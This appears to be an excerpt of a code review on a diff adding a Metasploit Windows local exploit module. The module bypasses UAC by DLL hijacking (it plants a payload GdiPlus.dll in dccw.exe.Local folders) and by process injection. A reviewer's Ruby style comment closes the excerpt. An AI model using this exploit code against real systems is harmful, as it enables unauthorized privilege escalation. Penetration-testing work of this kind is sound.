modules/exploits/windows/local/bypassuac_injection_winsxs.rb

```diff
@@ -0,0 +1,389 @@
+    rescue Rex::Post::Meterpreter::RequestError => e
+      print_error("Failed to Inject Payload to #{pid}!")
+      vprint_error(e.to_s)
+    end
+  end
+
+  # Create a process in the native architecture
+  def spawn_inject_proc(win_dir)
+    print_status('Spawning process with Windows Publisher Certificate, to inject into...')
+    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
+      cmd = "#{win_dir}\\sysnative\\notepad.exe"
+    else
+      cmd = "#{win_dir}\\System32\\notepad.exe"
+    end
+    pid = cmd_exec_get_pid(cmd)
+
+    unless pid
+      fail_with(Failure::Unknown, 'Spawning Process failed...')
+    end
+
+    pid
+  end
+
+  # Upload only one DLL, the rest will be copied into the specific folders
+  def upload_payload_dll(payload_filepath, directoryNames)
+    dllPath = "#{directoryNames[0]}\\GdiPlus.dll"
+    payload = generate_payload_dccw_gdiplus_dll({:dll_exitprocess => true})
+    print_status('Uploading the Payload DLL to the filesystem...')
+    begin
+      vprint_status("Payload DLL #{payload.length} bytes long being uploaded..")
+      write_file(dllPath, payload)
+    rescue Rex::Post::Meterpreter::RequestError => e
+      fail_with(Failure::Unknown, "Error uploading file #{directoryNames[0]}: #{e.class} #{e}")
+    end
+
+    if directoryNames.size > 1
+      copy_payload_dll(directoryNames, dllPath)
+    end
+  end
+
+  def copy_payload_dll(directoryNames, dllPath)
+    for i in 1 .. directoryNames.size - 1
+      if client.railgun.kernel32.CopyFileA(dllPath, "#{directoryNames[i]}\\GdiPlus.dll", false)['return'] == false
+        print_error("Error! Cannot copy the payload to all the necessary folders! Continuing just in case it works...")
+      end
+    end
+  end
+
+  def validate_environment!
+    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
+
+    winver = sysinfo['OS']
+
+    case winver
+    when /Windows (8|2008|2012|10)/
+      print_good("#{winver} may be vulnerable.")
+    else
+      fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")
+    end
+
+    if is_uac_enabled?
+      print_status('UAC is Enabled, checking level...')
+    else
+      unless is_in_admin_group?
+        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+      end
+    end
+  end
+
+  # Creating the necessary directories to perform the DLL hijacking
+  # Since we don't know which path "dccw.exe" will choose, we create
+  # all the directories that match with the initial pattern
+  def create_directories(payload_filepath, directoryNames)
+    env_vars = get_envs('TEMP')
+
+    print_status("Creating temporary folders...")
+    if client.railgun.kernel32.CreateDirectoryA(payload_filepath, nil)['return'] == 0
+      fail_with(Failure::Unknown, "Cannot create the directory \"#{env_vars['TEMP']}dccw.exe.Local\"")
+    end
+
+    for i in 0 .. directoryNames.size - 1
```

Comment:
can be replaced with (directoryNames.size - 1).times do |i| and will look cleaner and be more Ruby style